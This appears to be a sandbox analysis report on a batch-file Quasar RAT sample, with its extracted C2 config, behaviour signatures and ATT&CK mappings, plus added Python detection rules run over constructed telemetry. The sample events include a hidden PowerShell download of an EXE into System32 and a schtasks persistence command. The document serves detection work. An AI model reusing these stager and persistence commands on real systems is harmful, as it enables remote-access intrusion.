General

  • Target

    Test.bat

  • Size

    186B

  • Sample

    240530-p67b8ahd4z

  • MD5

    9c4d95c3db51f66fed113f3f97c634ed

  • SHA1

    4aa3b2737d2883c3546ba198dbfe01354ed280b3

  • SHA256

    624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

  • SHA512

    ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Astro-1

C2

arthurus36.duckdns.org:5555

Mutex

ad7cd985-5e2e-45a3-9246-b82449c7c4d8

Attributes
  • encryption_key

    6314C8C60AA1035CEB920FD38F0342E398BAF5D0

  • install_name

    cmdprmpt.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    systemdex

Targets

    • Target

      Test.bat

    • Quasar RAT

      Quasar is an open-source remote access tool (RAT).

    • Quasar payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
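
The signature chain above (batch stager, PowerShell Invoke-WebRequest, a downloaded PE dropped into System32 and executed, scheduled-task persistence, and an outbound connection to the Quasar C2) can be written as detection logic. The following is an added example written for this page; it is not code from the sandbox, the report, or the Quasar project. It runs a few rules over constructed Sysmon-style events and ties the beaconing process back to the stager. The C2 host and port, install name and startup key are taken from the extracted config above; the PIDs, file paths, download URL, and the assumption that the startup key appears as a schtasks task name are illustrative only.

```python
import re

# Indicators taken from the extracted Quasar config on this page.
C2_HOST = "arthurus36.duckdns.org"
C2_PORT = 5555
INSTALL_NAME = "cmdprmpt.exe"
STARTUP_KEY = "systemdex"

# PowerShell download primitives a batch stager typically invokes.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
SCHTASKS_TN_RE = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)

# Constructed sample telemetry shaped like Sysmon events (1 = process create,
# 3 = network connect, 11 = file create). PIDs, paths, the download URL and the
# schtasks command line are assumptions for illustration, not sandbox observations.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\Test.bat"'},
    {"id": 1, "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden Invoke-WebRequest -Uri https://files.example/p -OutFile C:\Windows\System32\cmdprmpt.exe"},
    {"id": 11, "pid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Windows\System32\cmdprmpt.exe"},
    {"id": 1, "pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmdprmpt.exe",
     "cmdline": r"C:\Windows\System32\cmdprmpt.exe"},
    {"id": 1, "pid": 103, "ppid": 102, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "systemdex" /sc ONLOGON /rl HIGHEST /tr "C:\Windows\System32\cmdprmpt.exe" /f'},
    {"id": 3, "pid": 102, "image": r"C:\Windows\System32\cmdprmpt.exe",
     "dest_host": "arthurus36.duckdns.org", "dest_port": 5555},
]


def _lineage(events, pid):
    """Walk parent pointers upward from pid, returning the chain of image basenames."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def rule_powershell_download(events):
    """Execution (T1059.001): PowerShell invoking a download cmdlet."""
    return [e["pid"] for e in events
            if e["id"] == 1 and e["image"].lower().endswith("powershell.exe")
            and DOWNLOAD_RE.search(e["cmdline"])]


def rule_dropped_exe_executed(events):
    """A process whose image was written earlier in the log by another process.
    Single pass so the file write must precede the execution."""
    written, hits = {}, []
    for e in events:
        if e["id"] == 11:
            written[e["target"].lower()] = e["pid"]
        elif e["id"] == 1 and e["image"].lower() in written:
            hits.append((e["pid"], written[e["image"].lower()]))
    return hits


def rule_drop_in_system32(events):
    """File written under System32 (the report's 'Drops file in System32 directory')."""
    return [e["target"] for e in events
            if e["id"] == 11 and "\\windows\\system32\\" in e["target"].lower()]


def rule_scheduled_task_persistence(events):
    """Persistence (T1053): schtasks /create naming the startup key or the install binary."""
    hits = []
    for e in events:
        if e["id"] != 1 or not e["image"].lower().endswith("schtasks.exe"):
            continue
        cmd = e["cmdline"]
        if "/create" not in cmd.lower():
            continue
        m = SCHTASKS_TN_RE.search(cmd)
        name = m.group(1) if m else ""
        if name.lower() == STARTUP_KEY or INSTALL_NAME in cmd.lower():
            hits.append((e["pid"], name))
    return hits


def rule_c2_connection(events):
    """Command and Control: outbound connection to the extracted C2 host:port."""
    return [e["pid"] for e in events
            if e["id"] == 3 and e.get("dest_host", "").lower() == C2_HOST
            and e.get("dest_port") == C2_PORT]


def rule_stager_chain(events):
    """Tie each beaconing process back to a cmd.exe -> powershell.exe ancestry."""
    hits = []
    for pid in rule_c2_connection(events):
        chain = _lineage(events, pid)
        if "powershell.exe" in chain and "cmd.exe" in chain:
            hits.append((pid, chain))
    return hits


RULES = {
    "powershell_download": rule_powershell_download,
    "dropped_exe_executed": rule_dropped_exe_executed,
    "drop_in_system32": rule_drop_in_system32,
    "scheduled_task_persistence": rule_scheduled_task_persistence,
    "quasar_c2_connection": rule_c2_connection,
    "stager_chain": rule_stager_chain,
}


def analyse(events):
    """Run every rule and return only those that fired, with what they matched."""
    return {name: hits for name, rule in RULES.items() if (hits := rule(events))}


if __name__ == "__main__":
    for name, hits in analyse(SAMPLE_EVENTS).items():
        print(f"[+] {name}: {hits}")
```

The per-rule hits are deliberately weak on their own (PowerShell downloads and schtasks are common); the value is in correlating them, which `rule_stager_chain` does by requiring the C2-connecting process to descend from a cmd.exe-launched PowerShell. Swap the constructed `SAMPLE_EVENTS` for real Sysmon or EDR process, file and network events to use the rules against live telemetry.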

MITRE ATT&CK Matrix (ATT&CK v13)

Each entry lists the technique, its ID, and the number of matching signatures.

Execution

  • Command and Scripting Interpreter (T1059): 1
  • PowerShell (T1059.001): 1
  • Scheduled Task/Job (T1053): 1

Persistence

  • Scheduled Task/Job (T1053): 1

Privilege Escalation

  • Scheduled Task/Job (T1053): 1

Discovery

  • Query Registry (T1012): 1

Command and Control

  • Web Service (T1102): 1

Tasks